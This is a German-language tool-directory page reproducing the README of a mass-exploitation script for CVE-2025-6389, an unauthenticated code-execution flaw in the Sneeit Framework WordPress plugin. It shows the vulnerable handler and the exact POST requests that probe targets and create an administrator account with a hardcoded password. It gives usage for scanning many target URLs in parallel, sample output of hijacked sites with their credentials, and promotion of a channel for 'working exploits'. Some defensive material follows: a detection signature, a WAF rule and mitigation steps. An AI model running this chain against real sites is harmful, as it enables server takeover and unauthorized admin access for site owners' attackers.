Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-6389 — Sneeit Framework <= 8.3 – Nicht authentifizierte Remote-Codeausführung in sneeit_articles_pagination_callback | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-6389
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubnxploited/cve-2025-6389

CVE-2025-6389

Sneeit Framework <= 8.3 – Nicht authentifizierte Remote-Codeausführung in sneeit_articles_pagination_callback

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-6389

Sneeit Framework <= 8.3 – Nicht authentifizierte Remote-Code-Ausführung in sneeit_articles_pagination_callback

root@kitploit:~
    _______      ________    ___   ___ ___  _____         __ ____   ___   ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|       / /|___ \ / _ \ / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ / /_  __) | (_) | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
 | |____   \  /  | |____    / /_| |_| / /_ ___) |     | (_) |__) | (_) |  / / 
  \_____|   \/   |______|  |____|\___|/____|____/       \___/____/ \___/  /_/  

Telegram CVE CVSS Python

License

📡 Verpassen Sie nicht den nächsten Drop. Folgen Sie @KNxploited auf Telegram – dem definitiven Kanal für frisch veröffentlichte CVEs, funktionierende Exploits und erstklassige Sicherheitsforschung. Der Erste, der es weiß. Der Erste, der handelt.


🧠 Übersicht

CVE-2025-6389 ist eine CVSS 9.8 kritische Remote-Code-Ausführungs-Schwachstelle im Sneeit Framework-Plugin für WordPress.

Der Fehler steckt in der Funktion sneeit_articles_pagination_callback(), die blind benutzergesteuerte Eingaben an PHP's call_user_func() übergibt – ein nicht authentifizierter Angreifer kann jede PHP-Funktion mit beliebigen Argumenten aufrufen, einschließlich wp_insert_user, und sich so effektiv vollständigen Administrationszugriff verschaffen oder beliebigen serverseitigen Code ausführen.

FeldDetails
CVE-IDCVE-2025-6389
PluginSneeit Framework (sneeit-framework)
Betroffene VersionenAlle Versionen bis einschließlich 8.3
SchwachstellentypRemote-Code-Ausführung (RCE)
AngriffsvektorNetzwerk – Keine Authentifizierung erforderlich
CVSS 3.1 Score9.8 KRITISCH
CVSS-VektorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
AuswirkungVollständige Server-Kompromittierung / Admin-Übernahme
ForscherNxploited

💀 Tiefergehende Schwachstellenanalyse

Die Ursache ist der Missbrauch von PHP's call_user_func() im AJAX-Handler des Plugins:

root@kitploit:~
// Registriert ohne Authentifizierungsprüfung
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];  // ← Vom Benutzer gesteuerter Funktionsname
    $args     = json_decode(stripslashes($_POST['args']), true); // ← Vom Benutzer gesteuerte Argumente

    // Aufruf BELIEBIGER PHP-Funktion mit BELIEBIGEN Argumenten – keinerlei Validierung
    $result = call_user_func($callback, ...$args);

    echo $result;
    die();
}

Warum dies kritisch ist:

  • wp_ajax_nopriv_* = zugänglich für jeden, kein Login erforderlich
  • call_user_func($callback, $args) = beliebiger Funktionsaufruf
  • Angreifer kann var_dump, system, wp_insert_user, eval oder jede andere PHP/WordPress-Funktion aufrufen
  • Die Antwort wird direkt zurückgegeben – ermöglicht blinde & verbose RCE

⚔️ Exploit-Kette

root@kitploit:~
Schritt 1 – Sondierung / Fingerabdruck
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

Erwartete Antwort → array(1) { [0]=> string(4) "test" }
  ↓
Bestätigt: call_user_func() ist erreichbar und gibt Ausgabe zurück

──────────────────────────────────────────────────────────────────
Schritt 2 – Erstellung eines Administratorkontos
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX",
               "user_pass":"xplpass",
               "user_email":"...",
               "role":"administrator"}

Ergebnis → Neues Administratorkonto stillschweigend auf dem Ziel erstellt
  ↓
Vollständiger WordPress-Admin-Panel-Zugriff erreicht ✔️

⚙️ Anforderungen

root@kitploit:~
pip install requests rich
AbhängigkeitZweck
requestsHTTP-Anfragen mit Sitzungs-/Proxy-Unterstützung
richLive-Terminal-Dashboard, Panels, Fortschritt
threadingGleichzeitige Mehrfachziel-Verarbeitung
queueThreadsichere Zielverteilung

Python 3.8+ erforderlich. Typannotationen verwenden die in 3.9+ eingeführte tuple[...]-Syntax – für beste Kompatibilität Python 3.9+ verwenden.


📂 Dateistruktur

root@kitploit:~
CVE-2025-6389/
├── CVE-2025-6389.py          # Haupt-Exploit-Skript
├── list.txt                  # Ziel-URLs – eine pro Zeile
├── success_results.txt       # Automatisch generiert: erfolgreiche Ziele + Anmeldedaten
└── debug_responses/          # Automatisch generiert: rohe Serverantworten zum Debuggen
    └── <target>.resp.txt

🚀 Verwendung

Schritt 1 – Ziele vorbereiten

Erstellen Sie list.txt mit einer URL pro Zeile:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

URLs ohne http:// oder https:// werden automatisch mit http:// versehen.


Schritt 2 – Exploit ausführen

root@kitploit:~
python CVE-2025-6389.py

Sie werden zur Eingabe aufgefordert:

root@kitploit:~
Name der Zieldatei (Standard list.txt): list.txt
Anzahl der Threads (Standard 10):       20

Schritt 3 – Live-Dashboard

Das Skript startet ein Echtzeit-Rich-Dashboard mit:

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────┐
│  [ASCII BANNER]                                                      │
├──────────────────────────────┬──────────────────────────────────────┤
│  Info                        │  Statistiken                          │
│  Verwendung: Ziele in...    │  Gesamtziele:  150                 │
│  Threads: 20                 │  Verarbeitet:      87                  │
│  Passwort: xplpass           │  Erfolge:      12                  │
│  Erfolgsprotokoll: success... │  Fehlschläge:       75                  │
│  Debug-Verzeichnis: debug_responses  │  Verstrichene Zeit:        00:01:43            │
├──────────────────────────────┴──────────────────────────────────────┤
│  Aktuelle Ergebnisse                                                      │
│  Zeit     Ziel                              Ergebnis                 │
│  14:23:01 https://victim.com                  ERFOLG               │
│  14:23:03 https://example.net                 FEHLGESCHLAGEN                  │
└─────────────────────────────────────────────────────────────────────┘

Schritt 4 – Ergebnisse prüfen

Erfolgreiche Exploits werden in success_results.txt gespeichert:

root@kitploit:~
https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: [email protected]

Debug-Antworten (für fehlgeschlagene Ziele) werden unter debug_responses/ gespeichert:

root@kitploit:~
debug_responses/
└── https___victim.com.resp.txt   ← Rohe Serverantwort zur Analyse

🖥️ Referenz der Skriptparameter

EingabeaufforderungStandardBeschreibung
Zieldateilist.txtDatei mit den Ziel-URLs
Anzahl der Threads10 (max: 200)Gleichzeitige Arbeiter – erhöhen für Massen-Scans
Passwortxplpass (hartcodiert)Passwort für erstellte Administratorkonten
BenutzernamensformatNxploited_XXXXAutomatisch generiert mit zufälligem 4-stelligen Suffix

📊 Erkennungssignatur

Der Exploit erzeugt die folgende Netzwerksignatur – nützlich für Verteidiger und WAF-Regel-Autoren:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=sneeit_articles_pagination&callback=<FUNCTION>&args=<JSON>

WAF / IDS-Regel (Pseudocode):

root@kitploit:~
IF request.method == POST
AND request.path  == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "sneeit_articles_pagination"
AND request.body CONTAINS "callback"
THEN BLOCK + ALARM

🛡️ Eindämmung & Behebung

Wenn Sie Website-Betreiber, Entwickler oder Verteidiger sind, ergreifen Sie sofort folgende Maßnahmen:

  • ✅ Aktualisieren Sie Sneeit Framework auf eine Version über 8.3, falls ein Patch verfügbar ist
  • ✅ Deaktivieren und löschen Sie das Plugin, bis eine gepatchte Version bestätigt ist
  • ✅ Überprüfen Sie kürzlich erstellte WordPress-Administratorkonten auf nicht autorisierte Einträge
  • ✅ Implementieren Sie serverseitige Eingabevalidierung – übergeben Sie niemals Benutzereingaben an call_user_func()
  • ✅ Blockieren Sie nicht authentifizierte POST-Anfragen an admin-ajax.php auf WAF/Firewall-Ebene
  • ✅ Überwachen Sie Serverprotokolle auf AJAX-Aktionsaufrufe von sneeit_articles_pagination
  • ✅ Aktivieren Sie die Zwei-Faktor-Authentifizierung für alle vorhandenen Administratorkonten als Containment-Maßnahme

⚠️ Haftungsausschluss

root@kitploit:~
DIESES WERKZEUG WIRD AUSSCHLIESSLICH ZU BILDUNGSZWECKEN, FÜR AUTORISIERTE
PENETRATIONSTESTS UND SICHERHEITSFORSCHUNG ZUR VERFÜGUNG GESTELLT.

Durch das Herunterladen, Ausführen oder Ändern dieses Skripts stimmen Sie
ausdrücklich Folgendem zu:

  • Sie haben die AUSDRÜCKLICHE, SCHRIFTLICHE Genehmigung des Inhabers jedes
    von Ihnen getesteten Systems. Keine Ausnahmen.

  • Sie arbeiten in einer kontrollierten Laborumgebung oder im Rahmen eines
    formell abgegrenzten und autorisierten Auftrags.

  • Sie werden dieses Werkzeug NICHT gegen ein System, Netzwerk oder eine
    Infrastruktur einsetzen, für deren Test Sie keine rechtliche Genehmigung haben.

  • Nxploited und alle Mitwirkenden übernehmen KEINERLEI Haftung für
    unbefugte Nutzung, Schäden, Datenverlust, rechtliche Schritte oder
    strafrechtliche Verfolgung, die aus der Nutzung dieses Werkzeugs entstehen.

Die unbefugte Nutzung dieses Exploits ist eine Straftat gemäß:
  – Computer Fraud and Abuse Act (CFAA), USA
  – Computer Misuse Act (CMA), Großbritannien
  – EU-Richtlinie 2013/40/EU über Angriffe auf Informationssysteme
  – Und allen gleichwertigen nationalen und internationalen Cyberstrafgesetzen.

VERWENDEN SIE ES VERANTWORTUNGSVOLL. HACKEN SIE ETHISCH. MELDEN SIE
SCHWACHSTELLEN VERANTWORTUNGSVOLL.

👤 Autor

HandleNxploited (Khaled Alenazi)
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Folgen Sie @KNxploited auf Telegram Der Kanal, auf dem echte Exploits zuerst erscheinen – CVEs, Zero-Days, PoCs und tiefgehende Schwachstellenforschung. Regelmäßig aktualisiert. Bleiben Sie scharf.


Mit Präzision gefertigt von Nxploited · Nur für autorisierte Sicherheitsforschung · CVSS 9.8 Kritisch
Tool herunterladen